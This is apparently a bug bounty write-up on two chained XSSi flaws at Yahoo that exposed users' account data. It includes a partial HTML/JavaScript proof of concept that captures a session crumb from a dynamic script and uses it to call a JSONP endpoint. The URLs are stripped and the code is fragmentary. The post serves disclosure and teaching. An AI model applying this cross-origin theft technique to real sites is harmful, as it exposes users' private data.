Yahoo — Two XSSi vulnerabilities chained to steal user information. ($750 Bounty)

While intercepting requests using Burp Suite I noticed the following request:

When I saw that this was a JSONP endpoint I immediately knew this could potentially be an XSSi vulnerability. However, I noticed that if the value for the .crumb GET parameter wasn’t valid it would return the following response:

At this point I realized that if I could somehow steal the victims valid .crumb value, I could successfully steal information about their account. I then searched all requests I intercepted in Burp Suite for my valid crumb and I quickly found it in in a dynamic Javascript file located at:

If you go to this page now you will not find the logoutCrumb value since they have patched this issue. However, when I initially discovered this issue the file looked like this:

Now, for people that don’t understand how XSSi works the vulnerability essentially takes advantage of Same-Origin Policy (SOP) not being applied to Javascript src attribute within the script tag. I then created the following Proof of Concept which steals the valid .crumb value from the dynamic Javascript file at and then places the valid crumb in the .crumb GET parameter as seen here which returns a proper response containing information about the user. Using the code below I was able to extract information:

<title>Yahoo XSSi PoC</title>
<div style="width: 60%; margin-right: auto; margin-left: auto; margin-bottom: 30px;">
<h1 style="text-align: center;">Proof of Concept</h1>
<b>Dataset 1:</b>
<div id="content1" style="width: 100%; border: 1px solid black; padding: 10px; overflow: scroll; font-family: monospace;"></div>
<b>Dataset 2:</b>
<div id="content2" style="width: 100%; border: 1px solid black; padding: 10px; overflow: scroll; font-family: monospace;"></div>
function processDeviceUsers(data) {
document.getElementById("content1").innerHTML = JSON.stringify(data);
window.onload = function () {
var config = {};
config_data = {};
config.merge = function(data) { config_data = data };
document.getElementById("content2").innerHTML = JSON.stringify(config_data);
var src = "" + config_data.session.logoutCrumb;
var s = document.createElement('script');
s.setAttribute('src', src);
<script src=""></script>
<script src=""></script>

Below is a screenshot of the payload I submitted to Yahoo and received a $750 bug bounty. Overall, I had a great time developing the Proof of Concept for this vulnerability chain and I hope others are able to learn a thing or two from this write up.